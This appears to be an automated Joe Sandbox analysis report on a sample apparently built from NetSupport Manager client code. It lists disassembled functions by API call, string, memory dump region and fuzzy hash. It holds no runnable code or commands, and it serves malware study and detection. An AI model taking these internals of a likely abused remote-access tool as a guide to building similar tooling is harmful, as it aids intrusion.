Opcode Fuzzy Hash: c443bbb7c17a30be6c3a42f858cb2093c76a35b5b8b0053dda7328189b0e033c
Instruction Fuzzy Hash: 2FB092B0392350CDAF01177E4D0629A30D80FC424BF6208606A51CAD8AEF20D506A929

Function 11144EA0 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 11144DC0: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,NSM.LIC), ref: 11144DE7

Part of subcall function 11163FED: __fsopen.LIBCMT ref: 11163FFA

GetLastError.KERNEL32(?,013FB8D8,000000FF,?), ref: 11144ED5
Sleep.KERNEL32(000000C8,?,?,?,?,?,?,013FB8D8,000000FF,?), ref: 11144EE5

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
String ID:
API String ID: 3768737497-0
Opcode ID: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
Instruction ID: cc8fd34c32098476147d622d57126809c91a32baa97f0e350d3592d26a0b2836
Opcode Fuzzy Hash: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
Instruction Fuzzy Hash: 8D110875D4411AEBD7119F94C9C4A6EF3BCEF85A29F200164FC0497A00E775AD11C7A3

Function 110106C0 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 11010774

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_
String ID:
API String ID: 3382485803-0
Opcode ID: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
Instruction ID: 0f97abe7109b731a14a0a5233c6982db04001c22e931a1e4a38e375530e3522e
Opcode Fuzzy Hash: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
Instruction Fuzzy Hash: D9515D74E00645DFDB04CF98C980AADBBF5BF88318F24829DD5869B385C776E942CB90

Function 11143000 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75A78400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
Instruction ID: 1cdda14904265755d753c391d3c49599355d775305d59026304f2c7825c43cec
Opcode Fuzzy Hash: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
Instruction Fuzzy Hash: 5D1193716282655AEB218E14D690BAFFBAAEFC5B24F30836AE51547E04C3329886C750

Function 110FACC0 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FACED

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
Instruction ID: 5942e99df11cc5ddd12142181c934b3f7ef04b83757ceed83c361bf33f076152
Opcode Fuzzy Hash: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
Instruction Fuzzy Hash: 8911AC71E1011DDBDB11DFA8DC557EE73F8DB58305F0041D9E9099B240DA71AE488B90

Function 11170166 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,110310DF,00000000,?,11169DD4,?,110310DF,00000000,00000000,00000000,?,1116B767,00000001,00000214,?,1110F4AE), ref: 111701A9

Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
Instruction ID: 37eba9f6ddbe8283f17829f7b0a109b8136aa2f13792341ea1fc2e0acbbf6d66
Opcode Fuzzy Hash: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
Instruction Fuzzy Hash: 590124392013669BEB099F25EC60B5BB799AB83365F014529EC15CA3C0DB70D900C340

Function 6C5FA082 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,6C5F6F16,00000000,?,6C5FD40B,00000001,6C5F6F16,00000000,00000000,00000000,?,6C5F6F16,00000001,00000214), ref: 6C5FA0C5

Part of subcall function 6C5F60F9: __getptd_noexit.LIBCMT ref: 6C5F60F9

Memory Dump Source

Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 89cb6d38661ce6378b85d8364bcca7c80e1abfb69e8d54dd89df876cfeed6a89
Instruction ID: 007abf6902efb8a09d600b6b51ba5231d223184a43b03df5e63c19687b988cdf
Opcode Fuzzy Hash: 89cb6d38661ce6378b85d8364bcca7c80e1abfb69e8d54dd89df876cfeed6a89
Instruction Fuzzy Hash: 4B01D8313062119FFB1D9E26DC54B57376CEF81369F114629E835C7990DB75D802CE52

Function 111672E3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

__waccess_s.LIBCMT ref: 111672EE

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: __waccess_s
String ID:
API String ID: 4272103461-0
Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
Instruction ID: b67d37eb909022d12c4b3a5208e3be1f16578853890f7fcac85d973ba88585e6
Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
Instruction Fuzzy Hash: C5C09B3705811D7F5F055DE5EC00C557F5DD6806747148156F91C89590DD73E561D540

Function 11163FED Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE

Download Yara Rule

APIs

__fsopen.LIBCMT ref: 11163FFA

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: __fsopen
String ID:
API String ID: 3646066109-0
Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction ID: 3fb95567750ac4c2837cb65daf82bfaf3169cdeaa60eaf7921ceae4fe4d00650
Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction Fuzzy Hash: 76C0927645424C77DF112A82EC02E4A7F2E9BC0668F448060FB1C19160AAB3EA71DACA

Function 00A51000 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

_NSMClient32@8.PCICL32(?,?,?,00A510A2,00000000), ref: 00A5100B

Memory Dump Source

Source File: 00000006.00000002.3898205616.0000000000A51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000006.00000002.3898187027.0000000000A50000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3898223938.0000000000A52000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a50000_bild.jbxd

Yara matches

Similarity

API ID: Client32@8
String ID:
API String ID: 433899448-0
Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
Instruction ID: 6cddb63b42c8a5e213129c554caef22334a7fbd20895fb35da59db8f4c2e5512
Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
Instruction Fuzzy Hash: E6B092B211434D9B8714EE98E941D7B339CBA98600F000809BD0543282CA71FC609671

Non-executed Functions

Function 1102D330 Relevance: 70.6, APIs: 21, Strings: 19, Instructions: 575sleepfileshutdownCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(111ED4B8), ref: 1102D382
Sleep.KERNEL32(0000EA60), ref: 1102D3A5

Part of subcall function 11026F20: PostThreadMessageA.USER32(00000000,00000501,1102D590,00000000), ref: 11026F72
Part of subcall function 11026F20: Sleep.KERNEL32(00000032,?,1102D590,00000001), ref: 11026F76
Part of subcall function 11026F20: PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 11026F97
Part of subcall function 11026F20: WaitForSingleObject.KERNEL32(00000000,00000032,?,1102D590,00000001), ref: 11026FA2
Part of subcall function 11026F20: CloseHandle.KERNEL32(00000000,1102E392,?,1102D590,00000001), ref: 11026FB4
Part of subcall function 11026F20: FreeLibrary.KERNEL32(00000000,00000000,00000000,1102E392,?,1102D590,00000001), ref: 11026FE1

GetCurrentProcess.KERNEL32(00000020,00000000,00000000), ref: 1102D3AB
SetPriorityClass.KERNEL32(00000000), ref: 1102D3B2
SetEvent.KERNEL32(000000F8), ref: 1102D3E7
Sleep.KERNEL32(000007D0), ref: 1102D4D8
PostThreadMessageA.USER32(00001C84,00000000,00000000,00000000), ref: 1102D5BC
CloseHandle.KERNEL32(00000294), ref: 1102D815
_free.LIBCMT ref: 1102D825
_free.LIBCMT ref: 1102D841
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1102D8D4
GetFileAttributesA.KERNEL32(?), ref: 1102D8E1
_memset.LIBCMT ref: 1102D983
FindFirstFileA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 1102D99B
FindNextFileA.KERNEL32(00000000,00000010,?,?,?,00000000,00000000), ref: 1102D9C2
FindClose.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 1102D9C9
ExitWindowsEx.USER32(00000002,00000000), ref: 1102DAB7
Sleep.KERNEL32(00002710), ref: 1102DABE
ExitWindowsEx.USER32(00000006,00000000), ref: 1102DAD4
Sleep.KERNEL32(000007D0), ref: 1102DAE0
ExitProcess.KERNEL32 ref: 1102DAF4

Strings

remove smartcard devices, xrefs: 1102D623
506407, xrefs: 1102D412
CLIENT32.CPP, xrefs: 1102D95F
Stop tracing, almost terminated, xrefs: 1102DA88
Warning. Unprocessed notify, type=%d, xrefs: 1102D721
Terminate Client32 (err=%d), xrefs: 1102D362
Audio, xrefs: 1102D50E
HookDirectSound, xrefs: 1102D509
pSlash, xrefs: 1102D964
Termed, xrefs: 1102D690
Finished terminate, xrefs: 1102DAE6
Unload Hook, xrefs: 1102D4DE
Error %s unloading audiocap dll, xrefs: 1102D896
Warning. Unprocessed notify NC_CMD, cmd=%d, xrefs: 1102D719
Error. Multiple Terminate. , xrefs: 1102D38C
TermUI..., xrefs: 1102D681
*.*, xrefs: 1102D973
delete gMain.ev, xrefs: 1102D7E2
deleted ipc, xrefs: 1102D6B7

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: Sleep$File$CloseExitFindMessagePostThread$HandleProcessWindows_free$AttributesClassCurrentEventFirstFreeIncrementInterlockedLibraryModuleNameNextObjectPrioritySingleWait_memset
String ID: *.*$506407$Audio$CLIENT32.CPP$Error %s unloading audiocap dll$Error. Multiple Terminate. $Finished terminate$HookDirectSound$Stop tracing, almost terminated$TermUI...$Termed$Terminate Client32 (err=%d)$Unload Hook$Warning. Unprocessed notify NC_CMD, cmd=%d$Warning. Unprocessed notify, type=%d$delete gMain.ev$deleted ipc$pSlash$remove smartcard devices
API String ID: 2369127096-1333306918
Opcode ID: add873a8ab015faf9889e95090e84e2001c1be1f53f7e8c1ad7b83b87d9131ad
Instruction ID: 7f46233fb5632011b045e2eff7fc4cb47a6b13c38cfe1b2a85386abe64dfbaee
Opcode Fuzzy Hash: add873a8ab015faf9889e95090e84e2001c1be1f53f7e8c1ad7b83b87d9131ad
Instruction Fuzzy Hash: D212F778E001229FDB16DFE8CCC4E6DF7A6AB8470CFA401A9E52557644EB71BD80CB52

Function 1103B160 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 196fileCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,?), ref: 1103B1B2
GetUserNameA.ADVAPI32(?,?), ref: 1103B1D9

Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A

DeleteFileA.KERNEL32(?), ref: 1103B23A
_sprintf.LIBCMT ref: 1103B2BB
_fputs.LIBCMT ref: 1103B330
GetFileAttributesA.KERNEL32(?), ref: 1103B3A1
_free.LIBCMT ref: 1103B336

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

SetFileAttributesA.KERNEL32(?,00000000), ref: 1103B3DF

Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584

Strings

\Rewards.bin, xrefs: 1103B1F1
IsA(), xrefs: 1103B226, 1103B25E, 1103B38D, 1103B3C7
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1103B221, 1103B259, 1103B388, 1103B3C2
P, xrefs: 1103B1CF
%05d, xrefs: 1103B2B1

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

Similarity

API ID: File$AttributesExitProcess$DeleteErrorFolderLastMessageNamePathUser__strdup_fputs_free_sprintf_strrchrwsprintf
String ID: %05d$IsA()$P$\Rewards.bin$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 383231468-3762817415
Opcode ID: 2af526d8f5190e790c0ca9edbbc40dfe78f9b0864dccbff27541257fc5a2cfb5
Instruction ID: bb1b01960f0c7610cbc3075388277e5ec166904b02cd10daef8a33cd2ba906d0
Opcode Fuzzy Hash: 2af526d8f5190e790c0ca9edbbc40dfe78f9b0864dccbff27541257fc5a2cfb5
Instruction Fuzzy Hash: 7A71A235D4462AAFDB15CB64CC54FEEB3B4AF54308F0442D8E819A7284EB71AA44CFA0

Function 11033010 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 312COMMON

Download Yara Rule

Strings

CheckClip Error: Can't open clip, e=%d, xrefs: 110330F0
DisableClipBoard, xrefs: 11033099, 110331A6, 11033335
Sendclip Error: Cant open clip, xrefs: 1103316D
openclip Error: Cant open clip, xrefs: 110332E2
Client, xrefs: 1103309E, 110331AB, 1103333A

Memory Dump Source

Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_bild.jbxd

Yara matches

